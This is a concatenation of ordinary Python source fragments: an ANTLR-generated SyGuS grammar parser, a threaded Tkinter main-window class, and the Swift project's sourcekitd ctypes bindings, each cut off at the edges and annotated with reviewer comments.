                listener.enterSortDefCmd(self)

        def exitRule(self, listener:ParseTreeListener):
            if hasattr( listener, "exitSortDefCmd" ):
                listener.exitSortDefCmd(self)

        def accept(self, visitor:ParseTreeVisitor):
            if hasattr( visitor, "visitSortDefCmd" ):
                return visitor.visitSortDefCmd(self)
            else:
                return visitor.visitChildren(self)




    def sortDefCmd(self):
        # Rule 'sortDefCmd': '(' 'define-sort' symbol sortExpr ')'.
        localctx = SygusParser.SortDefCmdContext(self, self._ctx, self.state)
        self.enterRule(localctx, 16, self.RULE_sortDefCmd)
        try:
            self.enterOuterAlt(localctx, 1)
            self.state = 151
            self.match(SygusParser.T__0)
            self.state = 152
            self.match(SygusParser.T__4)
            self.state = 153
            self.symbol()
            self.state = 154
            self.sortExpr()
            self.state = 155
            self.match(SygusParser.T__2)
        except RecognitionException as re:
            localctx.exception = re
            self._errHandler.reportError(self, re)
            self._errHandler.recover(self, re)
        finally:
            self.exitRule()
        return localctx


    class SortExprContext(ParserRuleContext):

        def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
            super().__init__(parent, invokingState)
            self.parser = parser

        def intConst(self):
            return self.getTypedRuleContext(SygusParser.IntConstContext,0)


        def eCList(self):
            return self.getTypedRuleContext(SygusParser.ECListContext,0)


        def sortExpr(self, i:int=None):
            if i is None:
                return self.getTypedRuleContexts(SygusParser.SortExprContext)
            else:
                return self.getTypedRuleContext(SygusParser.SortExprContext,i)


        def symbol(self):
            return self.getTypedRuleContext(SygusParser.SymbolContext,0)


        def getRuleIndex(self):
            return SygusParser.RULE_sortExpr

        def enterRule(self, listener:ParseTreeListener):
            if hasattr( listener, "enterSortExpr" ):
                listener.enterSortExpr(self)

        def exitRule(self, listener:ParseTreeListener):
            if hasattr( listener, "exitSortExpr" ):
                listener.exitSortExpr(self)

        def accept(self, visitor:ParseTreeVisitor):
            if hasattr( visitor, "visitSortExpr" ):
                return visitor.visitSortExpr(self)
            else:
                return visitor.visitChildren(self)




    def sortExpr(self):
        # Rule 'sortExpr' — the chunk is truncated here mid-statement; the
        # remainder of this method lies outside this view.
        localctx = SygusParser.SortExprContext(self, self._ctx, self.state)
        self.enterRule(localctx, 18, self.RULE_sortExpr)
        try:
            self.state = 177
            self._errHandler.sync(self)
            la_ = 
self._interp.adaptivePredict(self._input,4,self._ctx) if la_ == 1: self.enterOuterAlt(localctx, 1) self.state = 157 self.match(SygusParser.T__0) self.state = 158 self.match(SygusParser.T__5) self.state = 159 self.intConst() self.state = 160 self.match(SygusParser.T__2) pass elif la_ == 2: self.enterOuterAlt(localctx, 2) self.state = 162 self.match(SygusParser.T__6) pass elif la_ == 3: self.enterOuterAlt(localctx, 3) self.state = 163 self.match(SygusParser.T__7) pass elif la_ == 4: self.enterOuterAlt(localctx, 4) self.state = 164 self.match(SygusParser.T__8) pass elif la_ == 5: self.enterOuterAlt(localctx, 5) self.state = 165 self.match(SygusParser.T__0) self.state = 166 self.match(SygusParser.T__9) self.state = 167 self.eCList() self.state = 168 self.match(SygusParser.T__2) pass elif la_ == 6: self.enterOuterAlt(localctx, 6) self.state = 170 self.match(SygusParser.T__0) self.state = 171 self.match(SygusParser.T__10) self.state = 172 self.sortExpr() self.state = 173 self.sortExpr() self.state = 174 self.match(SygusParser.T__2) pass elif la_ == 7: self.enterOuterAlt(localctx, 7) self.state = 176 self.symbol() pass except RecognitionException as re: localctx.exception = re self._errHandler.reportError(self, re) self._errHandler.recover(self, re) finally: self.exitRule() return localctx class IntConstContext(ParserRuleContext): def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1): super().__init__(parent, invokingState) self.parser = parser def INTEGER(self): return self.getToken(SygusParser.INTEGER, 0) def getRuleIndex(self): return SygusParser.RULE_intConst def enterRule(self, listener:ParseTreeListener): if hasattr( listener, "enterIntConst" ): listener.enterIntConst(self) def exitRule(self, listener:ParseTreeListener): if hasattr( listener, "exitIntConst" ): listener.exitIntConst(self) def accept(self, visitor:ParseTreeVisitor): if hasattr( visitor, "visitIntConst" ): return visitor.visitIntConst(self) else: return 
visitor.visitChildren(self) def intConst(self): localctx = SygusParser.IntConstContext(self, self._ctx, self.state) self.enterRule(localctx, 20, self.RULE_intConst) try: self.enterOuterAlt(localctx, 1) self.state = 179 self.match(SygusParser.INTEGER) except RecognitionException as re: localctx.exception = re self._errHandler.reportError(self, re) self._errHandler.recover(self, re) finally: self.exitRule() return localctx class BoolConstContext(ParserRuleContext): def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1): super().__init__(parent, invokingState) self.parser = parser def getRuleIndex(self): return SygusParser.RULE_boolConst def enterRule(self, listener:ParseTreeListener): if hasattr( listener, "enterBoolConst" ): listener.enterBoolConst(self) def exitRule(self, listener:ParseTreeListener): if hasattr( listener, "exitBoolConst" ): listener.exitBoolConst(self) def accept(self, visitor:ParseTreeVisitor): if hasattr( visitor, "visitBoolConst" ): return visitor.visitBoolConst(self) else: return visitor.visitChildren(self) def boolConst(self): localctx = SygusParser.BoolConstContext(self, self._ctx, self.state) self.enterRule(localctx, 22, self.RULE_boolConst) self._la = 0 # Token type try: self.enterOuterAlt(localctx, 1) self.state = 181 _la = self._input.LA(1) if not(_la==SygusParser.T__11 or _la==SygusParser.T__12): self._errHandler.recoverInline(self) else: self._errHandler.reportMatch(self) self.consume() except RecognitionException as re: localctx.exception = re self._errHandler.reportError(self, re) self._errHandler.recover(self, re) finally: self.exitRule() return localctx class BVConstContext(ParserRuleContext): def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1): super().__init__(parent, invokingState) self.parser = parser def BVCONST(self): return self.getToken(SygusParser.BVCONST, 0) def getRuleIndex(self): return SygusParser.RULE_bVConst def enterRule(self, listener:ParseTreeListener): if 
hasattr( listener, "enterBVConst" ): listener.enterBVConst(self) def exitRule(self, listener:ParseTreeListener): if hasattr( listener, "exitBVConst" ): listener.exitBVConst(self) def accept(self, visitor:ParseTreeVisitor): if hasattr( visitor, "visitBVConst" ): return visitor.visitBVConst(self) else: return visitor.visitChildren(self) def bVConst(self): localctx = SygusParser.BVConstContext(self, self._ctx, self.state) self.enterRule(localctx, 24, self.RULE_bVConst) try: self.enterOuterAlt(localctx, 1) self.state = 183 self.match(SygusParser.BVCONST) except RecognitionException as re: localctx.exception = re self._errHandler.reportError(self, re) self._errHandler.recover(self, re) finally: self.exitRule() return localctx class EnumConstContext(ParserRuleContext): def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1): super().__init__(parent, invokingState) self.parser = parser def symbol(self, i:int=None): if i is None: return self.getTypedRuleContexts(SygusParser.SymbolContext) else: return self.getTypedRuleContext(SygusParser.SymbolContext,i) def getRuleIndex(self): return SygusParser.RULE_enumConst def enterRule(self, listener:ParseTreeListener): if hasattr( listener, "enterEnumConst" ): listener.enterEnumConst(self) def exitRule(self, listener:ParseTreeListener): if hasattr( listener, "exitEnumConst" ): listener.exitEnumConst(self) def accept(self, visitor:ParseTreeVisitor): if hasattr( visitor, "visitEnumConst" ): return visitor.visitEnumConst(self) else: return visitor.visitChildren(self) def enumConst(self): localctx = SygusParser.EnumConstContext(self, self._ctx, self.state) self.enterRule(localctx, 26, self.RULE_enumConst) try: self.enterOuterAlt(localctx, 1) self.state = 185 self.symbol() self.state = 186 self.match(SygusParser.T__13) self.state = 187 self.symbol() except RecognitionException as re: localctx.exception = re self._errHandler.reportError(self, re) self._errHandler.recover(self, re) finally: self.exitRule() return 
localctx class RealConstContext(ParserRuleContext): def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1): super().__init__(parent, invokingState) self.parser = parser def REALCONST(self): return self.getToken(SygusParser.REALCONST, 0) def getRuleIndex(self): return SygusParser.RULE_realConst def enterRule(self, listener:ParseTreeListener): if hasattr( listener, "enterRealConst" ): listener.enterRealConst(self) def exitRule(self, listener:ParseTreeListener): if hasattr( listener, "exitRealConst" ): listener.exitRealConst(self) def accept(self, visitor:ParseTreeVisitor): if hasattr( visitor, "visitRealConst" ): return visitor.visitRealConst(self) else: return visitor.visitChildren(self) def realConst(self): localctx = SygusParser.RealConstContext(self, self._ctx, self.state) self.enterRule(localctx, 28, self.RULE_realConst) try: self.enterOuterAlt(localctx, 1) self.state = 189 self.match(SygusParser.REALCONST) except RecognitionException as re: localctx.exception = re self._errHandler.reportError(self, re) self._errHandler.recover(self, re) finally: self.exitRule() return localctx class ECListContext(ParserRuleContext): def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1): super().__init__(parent, invokingState) self.parser = parser def symbolPlus(self): return self.getTypedRuleContext(SygusParser.SymbolPlusContext,0) def getRuleIndex(self): return SygusParser.RULE_eCList def enterRule(self, listener:ParseTreeListener): if hasattr( listener, "enterECList" ): listener.enterECList(self) def exitRule(self, listener:ParseTreeListener): if hasattr( listener, "exitECList" ): listener.exitECList(self) def accept(self, visitor:ParseTreeVisitor): if hasattr( visitor, "visitECList" ): return visitor.visitECList(self) else: return visitor.visitChildren(self) def eCList(self): localctx = SygusParser.ECListContext(self, self._ctx, self.state) self.enterRule(localctx, 30, self.RULE_eCList) try: self.enterOuterAlt(localctx, 1) 
self.state = 191 self.match(SygusParser.T__0) self.state = 192 self.symbolPlus() self.state = 193 self.match(SygusParser.T__2) except RecognitionException as re: localctx.exception = re self._errHandler.reportError(self, re) self._errHandler.recover(self, re) finally: self.exitRule() return localctx class SymbolPlusContext(ParserRuleContext): def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1): super().__init__(parent, invokingState) self.parser = parser def symbol(self): return self.getTypedRuleContext(SygusParser.SymbolContext,0) def symbolPlusTail(self): return self.getTypedRuleContext(SygusParser.SymbolPlusTailContext,0) def getRuleIndex(self): return SygusParser.RULE_symbolPlus def enterRule(self, listener:ParseTreeListener): if hasattr( listener, "enterSymbolPlus" ): listener.enterSymbolPlus(self) def exitRule(self, listener:ParseTreeListener): if hasattr( listener, "exitSymbolPlus" ): listener.exitSymbolPlus(self) def accept(self, visitor:ParseTreeVisitor): if hasattr( visitor, "visitSymbolPlus" ): return visitor.visitSymbolPlus(self) else: return visitor.visitChildren(self) def symbolPlus(self): localctx = SygusParser.SymbolPlusContext(self, self._ctx, self.state) self.enterRule(localctx, 32, self.RULE_symbolPlus) try: self.enterOuterAlt(localctx, 1) self.state = 195 self.symbol() self.state = 196 self.symbolPlusTail() except RecognitionException as re: localctx.exception = re self._errHandler.reportError(self, re) self._errHandler.recover(self, re) finally: self.exitRule() return localctx class SymbolPlusTailContext(ParserRuleContext): def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1): super().__init__(parent, invokingState) self.parser = parser def symbol(self): return self.getTypedRuleContext(SygusParser.SymbolContext,0) def symbolPlusTail(self): return self.getTypedRuleContext(SygusParser.SymbolPlusTailContext,0) def getRuleIndex(self): return SygusParser.RULE_symbolPlusTail def enterRule(self, 
listener:ParseTreeListener): if
# --- guiapp _MainWin fragment (Tkinter main window managed by a dedicated
# "guibot" worker thread). Contains the tail of __init__, go(),
# check_worklist(), and the head of destroy(). NOTE(review): physical line
# breaks appear to have been stripped from this section.
# Tail of __init__: sets title/size, raises the mainWinExists flag for
# threads waiting on window creation, and schedules check_worklist() to run
# once the Tk mainloop goes idle.
# (Note the window is not actually displayed until someone calls # our go() method.) inst.title(title) # Set the window width and height. inst.config(width=width, height=height) # Raise the guiapp.mainWinExists flag to announce that the main # window exists now - in case some other thread has been hanging # around just waiting for that to happen. mainWinExists.rise() # Ask TkInter to have the main window check the guibot worklist # for new things to do as soon as the GUI mainloop is running # & idle (waiting for events). inst.after_idle(inst.check_worklist) # End _MainWin.__init__() #--------------------------------------------- #----------------------------------------------------------------- # go() [instance public method] # # Start the TkInter GUI application's main loop, if # it's not already started. This method can be called # from any thread, but it always delegates its work to # the guibot worker thread, because TkInter doesn't # support being called from within multiple threads. def go(inst): global lock, guibot, mainloopRunning if ambot(): # If we're already in the guibot thread, # Raise the flag to announce the mainloop is running. if not mainloopRunning.rise(): # If it wasn't running already, logger.debug("_MainWin.go(): About to enter TkInter main loop...") # Go ahead and start the mainloop, but catch any exceptions. try: inst.mainloop() # Start the TkInter main loop. # Here's an Exception we may throw sometimes in our callbacks # when our thread is being asked to exit. However, I'm not sure # if this exception will actually make it through TkInter. except ExitingByRequest: logger.debug("_MainWin.go(): Exited from TkInter mainloop by request.") raise # Pass the exception on to our caller (probably Worker.run()). except: # If TkInter gives us an exception, logger.exception("_MainWin.go(): TkInter mainloop exited with an exception.") raise # Pass the exception on to our caller (probably Worker.run()).
# go() continued: the finally clause lowers mainloopRunning and destroys the
# window when the mainloop exits; if called from a non-guibot thread, the
# call is re-queued onto guibot without waiting.
finally: # If we ever exit the main loop, logger.debug("_MainWin.go(): in finally clause after TkInter main loop") mainloopRunning.fall() # Turn off mainloopRunning flag. logger.debug("_MainWin.go(): About to destroy main window") inst.destroy() # Delete the _MainWin object (& all its descendant widgets). logger.debug("_MainWin.go(): Destroyed main window") logger.debug("_MainWin.go(): guibot's task of running the TkInter mainloop is now complete.") else: logger.debug("_MainWin.go(): TkInter mainloop is already running; request ignored.") # If the main loop was already running, we get here and just # do nothing & return. Consider the "go" a success by default. # Or we might get here because of an exception. Either way, # the "go" task is now completed. logger.debug("_MainWin.go(): Returning from _MainWin.go().") else: # We're in the wrong thread... guibot.do(inst.go) # Re-call this method, in the background, # in the guibot thread. (Don't wait for it to finish!) # End _MainWin.go(). #--------------------------- #------------------------------------------------------------------ # check_worklist() [instance private method] # # This method should only be called from within the # guibot thread. When guibot is in the TkInter mainloop, # it arranges for TkInter to call this callback # periodically, to ensure that guibot can still check for # more tasks to do while within the context of the fact # that it is already in the middle of doing the "go" # (run mainloop) task). Needless to say, all tasks done # by the guibot within here need to finish quickly, so # that the GUI don't become unresponsive. def check_worklist(self): global guibot if not ambot(): raise WrongThread(("[%s] " % current_thread().name) + " guiapp._MainWin.check_worklist():\n\tCalling this " + "method directly from threads other than " + ("guibot (%s)\n\tis not supported. Use " % guibot.name) + "guigo() instead to start guibot's TkInter mainloop processing.") # If we get here, we're in the guibot thread.
# check_worklist() body: drains guibot's job queue non-blockingly (loop exits
# via the Empty exception), honors exit requests, quits the mainloop if the
# window was destroyed by a job, and interleaves update_idletasks() calls.
# Try doing any tasks that might be waiting in our worklist queue. # (But catch exceptions while doing so.) try: # The point of this loop is that if multiple tasks for us # got queued up since the last time we woke up, we go ahead # and do them all now (clear the queue) rather than going # to sleep for another tenth of a second after each item. # This loop is only exited when do1job() throws an Empty # exception (which it can do in nonblocking mode). while True: # If someone asked us to exit, comply by throwing ExitingByRequest. guibot.check_exitflag() # Retrieve and do 1 item from our queue, if available. try: guibot.do1job(block=False) # block=False says: if worklist is empty, don't wait for tasks. except WarningException: logger.warn("_MainWin.check_worklist(): guibot job exited by throwing a WARNING-level exception; ignoring...") #\The idea here being that mere warning-level exceptions shouldn't prevent processing of subsequent jobs. # Commented out b/c this happens too often to be worth including in debug output. # logger.debug('After do1job, queue size = %d' % guibot.todo.qsize()) # Make sure our main window hasn't disappeared; if so, quit. if self.destroyed: # Did that task result in the window getting torn down? # There's no need to run the TkInter mainloop any more if the # main window (and therefore all other windows?) no longer exist. logger.debug("_MainWin.check_worklist(): Widget destroyed out from under us; quitting main loop.") self.quit() # Tells TkInter to quit its main loop. return # Return from this routine without scheduling an "after" callback. # In between guibot tasks, let TkInter check for common events # like resize, etc., for better overall responsiveness of the GUI. self.update_idletasks() # If worklist is empty now, there's nothing else to do; just return. except Empty: # Is the worklist queue empty? pass # That's our normal way out of the loop. # If someone asked the guibot to exit, then exit TkInter's mainloop also.
# check_worklist() tail: ExitingByRequest quits the mainloop without
# rescheduling; other exceptions are logged (not re-raised) so the 100 ms
# self.after() reschedule at the end still runs, keeping guibot alive.
except ExitingByRequest: # Are we exiting check_worklist() b/c someone asked guibot to exit? self.quit() # Then, tell TkInter to quit its main loop as well. # Don't re-raise because TkInter may print an unwanted traceback for this exception. return # This avoids rescheduling callback to this method. except: # Did some other exception happen? logger.exception("_MainWin.check_worklist(): A guibot job threw an exception...") #-We don't re-raise the exception here, because we want the # last line of this function (rescheduling this callback) to # still be executed. If we didn't do that, guibot would get # stuck in the mainloop and be unable to execute any more tasks. # One alternative would be to quit the whole mainloop here, # but that might be a little too drastic. (Really, we should # look for fatal vs. non-fatal classes of exceptions, and # respond accordingly.) # This is commented out because it seemed too drastic. # print("_MainWin.check_worklist(): A guibot job threw an exception...",file=sys.stderr) # traceback.print_exc(file=sys.stderr) # self.destroy() # Destroy _MainWin widget and all subwidgets. Bad idea to do it this early? # raise # Re-raise that exception. Or does TkInter just swallow it up? # If we exited the above queue-consumption loop normally, or because of an # un-handled exception, then ask TkInter to call this routine again in not # less than 100 milliseconds. This effectively gives us our own main loop, # inside of TkInter's mainloop. The delay prevents excessive polling while # remaining reasonably responsive. self.after(100, self.check_worklist) # 100 ms = 1/10th sec. Decently responsive. # End _MainWin.check_worklist(). #---------------------------------------- #--------------------------------------------------------------------- # destroy() [instance public method] # # This overrides the default destroy method from our # superclass Tk. (However, we call it internally.) # # Basically, we just set some flags to track our state.
# destroy() head (truncated): under the module lock, ignores repeated
# destroy requests via the `destroyed` flag. NOTE(review): the trailing
# "return theMainWin" is cut off mid-definition in this chunk -- the rest of
# destroy() lies outside this view.
# def destroy(this): logger.debug("%s in _MainWin.destroy()..." % current_thread()) #real stdout # We also need to kill the guiapp thread (or at least # clear out its event queue, since those events probably # all refer to widgets that are being destroyed) but I'm # not quite sure how/when to best do this. with lock: if this.destroyed: logger.warn("_MainWin.destroy(): Main window has already been destroyed; ignoring request.") return theMainWin
# --- sourcekitd capi.py fragment (ctypes bindings for Swift's sourcekitd) ---
# NOTE(review): this module uses Python 2 constructs (`long`, `iteritems`,
# eager `map` in register_functions) -- running it under Python 3 would need
# porting; confirm the target interpreter before changing anything.
<reponame>ghostbar/swift-lang.deb # capi.py - sourcekitd Python Bindings -*- python -*- # # This source file is part of the Swift.org open source project # # Copyright (c) 2014 - 2016 Apple Inc. and the Swift project authors # Licensed under Apache License v2.0 with Runtime Library Exception # # See http://swift.org/LICENSE.txt for license information # See http://swift.org/CONTRIBUTORS.txt for the list of Swift project authors from ctypes import ( CFUNCTYPE, POINTER, Structure, addressof, c_bool, c_char_p, c_int, c_int64, c_size_t, c_uint64, c_void_p, cdll, py_object, string_at, ) # ctypes doesn't implicitly convert c_void_p to the appropriate wrapper # object. This is a problem, because it means that from_parameter will see an # integer and pass the wrong value on platforms where int != void*. Work around # this by marshalling object arguments as void**. c_object_p = POINTER(c_void_p) callbacks = {} ### Structures and Utility Classes ### class CachedProperty(object): """Decorator that lazy-loads the value of a property. The first time the property is accessed, the original property function is executed. The value it returns is set as the new value of that instance's property, replacing the original method.
# CachedProperty.__get__ replaces itself with the computed value on first
# access. Object wraps a sourcekitd request: retains other Objects, and
# builds int64/string/uid/dictionary/array requests from native values
# (dict/list contents converted recursively); __del__ releases the request.
# Response wraps a c_object_p and disposes it in __del__.
""" def __init__(self, wrapped): self.wrapped = wrapped try: self.__doc__ = wrapped.__doc__ except: pass def __get__(self, instance, instance_type=None): if instance is None: return self value = self.wrapped(instance) setattr(instance, self.wrapped.__name__, value) return value class Object(object): def __init__(self, obj): if isinstance(obj, Object): self._obj = conf.lib.sourcekitd_request_retain(obj) elif isinstance(obj, (int,long,bool)): self._obj = conf.lib.sourcekitd_request_int64_create(obj) elif isinstance(obj, str): self._obj = conf.lib.sourcekitd_request_string_create(obj) elif isinstance(obj, UIdent): self._obj = conf.lib.sourcekitd_request_uid_create(obj) elif isinstance(obj, dict): self._obj = conf.lib.sourcekitd_request_dictionary_create( POINTER(c_void_p)(), POINTER(c_void_p)(), 0) self._as_parameter_ = self._obj for k,v in obj.iteritems(): conf.lib.sourcekitd_request_dictionary_set_value(self, UIdent(k), Object(v)) elif isinstance(obj, (list,tuple)): self._obj = conf.lib.sourcekitd_request_array_create( POINTER(c_void_p)(), 0) self._as_parameter_ = self._obj for v in obj: conf.lib.sourcekitd_request_array_set_value(self, -1, Object(v)) else: raise ValueError("wrong init parameter (%s)" % type(obj)) self._as_parameter_ = self._obj def from_param(obj): return obj._as_parameter_ def __del__(self): if self._obj: conf.lib.sourcekitd_request_release(self) def __repr__(self): ptr = conf.lib.sourcekitd_request_description_copy(self) s = string_at(ptr) conf.free(ptr) return s class Response(object): def __init__(self, obj): if isinstance(obj, c_object_p): self._obj = self._as_parameter_ = obj else: raise ValueError("wrong init parameter (%s)" % type(obj)) def get_payload(self): return conf.lib.sourcekitd_response_get_value(self) def from_param(obj): return obj._as_parameter_ def __del__(self): if self._obj: conf.lib.sourcekitd_response_dispose(self) def __repr__(self): ptr = conf.lib.sourcekitd_response_description_copy(self) s = string_at(ptr) conf.free(ptr)
# UIdent wraps a sourcekitd UID; equality/hash are by underlying pointer
# address. ErrorKind is a registry-style enum keyed by integer id, with
# from_id() lookup and a lazily built value->name map. Variant head.
return s class UIdent(object): def __init__(self, obj): if isinstance(obj, c_object_p): self._obj = obj elif isinstance(obj, UIdent): self._obj = obj._obj elif isinstance(obj, str): self._obj = conf.lib.sourcekitd_uid_get_from_cstr(obj) else: raise ValueError("wrong init parameter (%s)" % type(obj)) self._as_parameter_ = self._obj def __str__(self): return conf.lib.sourcekitd_uid_get_string_ptr(self) def from_param(obj): return obj._as_parameter_ def __repr__(self): return "UIdent('%s')" % self.__str__() def _ptr(self): return addressof(self._obj.contents) def __eq__(self, other): return self._ptr() == UIdent(other)._ptr() def __ne__(self, other): return self._ptr() != UIdent(other)._ptr() def __hash__(self): return hash(self._ptr()) class ErrorKind(object): """ Describes the kind of type. """ # The unique kind objects, indexed by id. _kinds = [] _name_map = None def __init__(self, value): if value >= len(ErrorKind._kinds): ErrorKind._kinds += [None] * (value - len(ErrorKind._kinds) + 1) if ErrorKind._kinds[value] is not None: raise ValueError('ErrorKind already loaded') self.value = value ErrorKind._kinds[value] = self ErrorKind._name_map = None def from_param(self): return self.value @property def name(self): """Get the enumeration name of this error kind.""" if self._name_map is None: self._name_map = {} for key,value in ErrorKind.__dict__.items(): if isinstance(value,ErrorKind): self._name_map[value] = key return self._name_map[self] @staticmethod def from_id(id): if id >= len(ErrorKind._kinds) or ErrorKind._kinds[id] is None: raise ValueError('Unknown type kind {}'.format(id)) return ErrorKind._kinds[id] def __repr__(self): return 'ErrorKind.%s' % (self.name,) ErrorKind.CONNECTION_INTERRUPTED = ErrorKind(1) ErrorKind.REQUEST_INVALID = ErrorKind(2) ErrorKind.REQUEST_FAILED = ErrorKind(3) ErrorKind.REQUEST_CANCELLED = ErrorKind(4) class Variant(Structure): _fields_ = [ ("data", c_uint64 * 3)] def to_python_object(self): var_ty =
# Variant (3 x uint64 payload) converts sourcekitd variants to native Python
# values by type tag; arrays and dictionaries are walked via C apply_f
# callbacks that append into a Python accumulator passed as py_object.
conf.lib.sourcekitd_variant_get_type(self) if var_ty == VariantType.NULL: return None elif var_ty == VariantType.DICTIONARY: return self.to_python_dictionary() elif var_ty == VariantType.ARRAY: return self.to_python_array() elif var_ty == VariantType.INT64: return conf.lib.sourcekitd_variant_int64_get_value(self) elif var_ty == VariantType.STRING: return conf.lib.sourcekitd_variant_string_get_ptr(self) elif var_ty == VariantType.UID: return UIdent(conf.lib.sourcekitd_variant_uid_get_value(self)) else: assert(var_ty == VariantType.BOOL) return conf.lib.sourcekitd_variant_bool_get_value(self) def to_python_array(self): def applier(index, value, arr): arr.append(value.to_python_object()) return 1 # continue arr = [] conf.lib.sourcekitd_variant_array_apply_f(self, callbacks['array_applier'](applier), arr) return arr def to_python_dictionary(self): def applier(cobj, value, d): d[str(UIdent(cobj))] = value.to_python_object() return 1 # continue d = {} conf.lib.sourcekitd_variant_dictionary_apply_f(self, callbacks['dictionary_applier'](applier), d) return d class VariantType(object): """ Describes the kind of type. """ # The unique kind objects, indexed by id.
# VariantType: same registry-enum pattern as ErrorKind, with the 7 variant
# type ids (NULL..BOOL) registered below, followed by the CFUNCTYPE callback
# prototypes used by the array/dictionary apply functions.
_kinds = [] _name_map = None def __init__(self, value): if value >= len(VariantType._kinds): VariantType._kinds += [None] * (value - len(VariantType._kinds) + 1) if VariantType._kinds[value] is not None: raise ValueError('VariantType already loaded') self.value = value VariantType._kinds[value] = self VariantType._name_map = None def from_param(self): return self.value @property def name(self): """Get the enumeration name of this variant type.""" if self._name_map is None: self._name_map = {} for key,value in VariantType.__dict__.items(): if isinstance(value,VariantType): self._name_map[value] = key return self._name_map[self] @staticmethod def from_id(id): if id >= len(VariantType._kinds) or VariantType._kinds[id] is None: raise ValueError('Unknown type kind {}'.format(id)) return VariantType._kinds[id] def __repr__(self): return 'VariantType.%s' % (self.name,) VariantType.NULL = VariantType(0) VariantType.DICTIONARY = VariantType(1) VariantType.ARRAY = VariantType(2) VariantType.INT64 = VariantType(3) VariantType.STRING = VariantType(4) VariantType.UID = VariantType(5) VariantType.BOOL = VariantType(6) # Now comes the plumbing to hook up the C library. # Register callback types in common container. callbacks['array_applier'] = CFUNCTYPE(c_int, c_size_t, Variant, py_object) callbacks['dictionary_applier'] = CFUNCTYPE(c_int, c_object_p, Variant, py_object) # Functions strictly alphabetical order.
# functionList: (name, argtypes[, restype[, errcheck]]) tuples describing
# every sourcekitd C entry point; consumed by register_function below.
functionList = [ ("sourcekitd_cancel_request", [c_void_p]), ("sourcekitd_initialize", None), ("sourcekitd_request_array_create", [POINTER(c_object_p), c_size_t], c_object_p), ("sourcekitd_request_array_set_int64", [Object, c_size_t, c_int64]), ("sourcekitd_request_array_set_string", [Object, c_size_t, c_char_p]), ("sourcekitd_request_array_set_stringbuf", [Object, c_size_t, c_char_p, c_size_t]), ("sourcekitd_request_array_set_uid", [Object, c_size_t, UIdent]), ("sourcekitd_request_array_set_value", [Object, c_size_t, Object]), ("sourcekitd_request_create_from_yaml", [c_char_p, POINTER(c_char_p)], c_object_p), ("sourcekitd_request_description_copy", [Object], c_void_p), ("sourcekitd_request_description_dump", [Object]), ("sourcekitd_request_dictionary_create", [POINTER(c_object_p), POINTER(c_object_p), c_size_t], c_object_p), ("sourcekitd_request_dictionary_set_int64", [Object, UIdent, c_int64]), ("sourcekitd_request_dictionary_set_string", [Object, UIdent, c_char_p]), ("sourcekitd_request_dictionary_set_stringbuf", [Object, UIdent, c_char_p, c_size_t]), ("sourcekitd_request_dictionary_set_uid", [Object, UIdent, UIdent]), ("sourcekitd_request_dictionary_set_value", [Object, UIdent, Object]), ("sourcekitd_request_int64_create", [c_int64], c_object_p), ("sourcekitd_request_retain", [Object], c_object_p), ("sourcekitd_request_release", [Object]), ("sourcekitd_request_string_create", [c_char_p], c_object_p), ("sourcekitd_request_uid_create", [UIdent], c_object_p), ("sourcekitd_response_description_copy", [Response], c_char_p), ("sourcekitd_response_description_dump", [Response]), ("sourcekitd_response_description_dump_filedesc", [Response, c_int]), ("sourcekitd_response_dispose", [Response]), ("sourcekitd_response_error_get_description", [Response], c_char_p), ("sourcekitd_response_error_get_kind", [Response], ErrorKind.from_id), ("sourcekitd_response_get_value", [Response], Variant), ("sourcekitd_response_is_error", [Response], c_bool), # ("sourcekitd_send_request",
# functionList continued (send/shutdown/uid/variant accessors), then
# LibsourcekitdError and the head of register_function(), which tolerates
# entry points missing from older sourcekitd builds when ignore_errors.
("sourcekitd_send_request_sync", [Object], c_object_p), # ("sourcekitd_set_interrupted_connection_handler", ("sourcekitd_shutdown", None), ("sourcekitd_uid_get_from_buf", [c_char_p, c_size_t], c_object_p), ("sourcekitd_uid_get_from_cstr", [c_char_p], c_object_p), ("sourcekitd_uid_get_length", [UIdent], c_size_t), ("sourcekitd_uid_get_string_ptr", [UIdent], c_char_p), ("sourcekitd_variant_array_apply_f", [Variant, callbacks['array_applier'], py_object], c_bool), ("sourcekitd_variant_array_get_bool", [Variant, c_size_t], c_bool), ("sourcekitd_variant_array_get_count", [Variant], c_size_t), ("sourcekitd_variant_array_get_int64", [Variant, c_size_t], c_int64), ("sourcekitd_variant_array_get_string", [Variant, c_size_t], c_char_p), ("sourcekitd_variant_array_get_uid", [Variant, c_size_t], c_object_p), ("sourcekitd_variant_array_get_value", [Variant, c_size_t], Variant), ("sourcekitd_variant_bool_get_value", [Variant], c_bool), ("sourcekitd_variant_dictionary_apply_f", [Variant, callbacks['dictionary_applier'], py_object], c_bool), ("sourcekitd_variant_dictionary_get_bool", [Variant, UIdent], c_bool), ("sourcekitd_variant_dictionary_get_int64", [Variant, UIdent], c_int64), ("sourcekitd_variant_dictionary_get_string", [Variant, UIdent], c_char_p), ("sourcekitd_variant_dictionary_get_value", [Variant, UIdent], Variant), ("sourcekitd_variant_dictionary_get_uid", [Variant, UIdent], c_object_p), ("sourcekitd_variant_get_type", [Variant], VariantType.from_id), ("sourcekitd_variant_string_get_length", [Variant], c_size_t), ("sourcekitd_variant_string_get_ptr", [Variant], c_char_p), ("sourcekitd_variant_int64_get_value", [Variant], c_int64), ("sourcekitd_variant_uid_get_value", [Variant], c_object_p), ] class LibsourcekitdError(Exception): def __init__(self, message): self.m = message def __str__(self): return self.m def register_function(lib, item, ignore_errors): # A function may not exist, if these bindings are used with an older or # incompatible version of sourcekitd.
# register_function tail + register_functions. NOTE(review): under Python 3
# `map(register, functionList)` is lazy and would register nothing -- this
# code relies on Python 2's eager map; confirm interpreter before porting.
# Config head (truncated): library path/file setters plus lazy `lib`/`free`
# properties; the cdll.LoadLibrary('libc.dylib') call is macOS-specific.
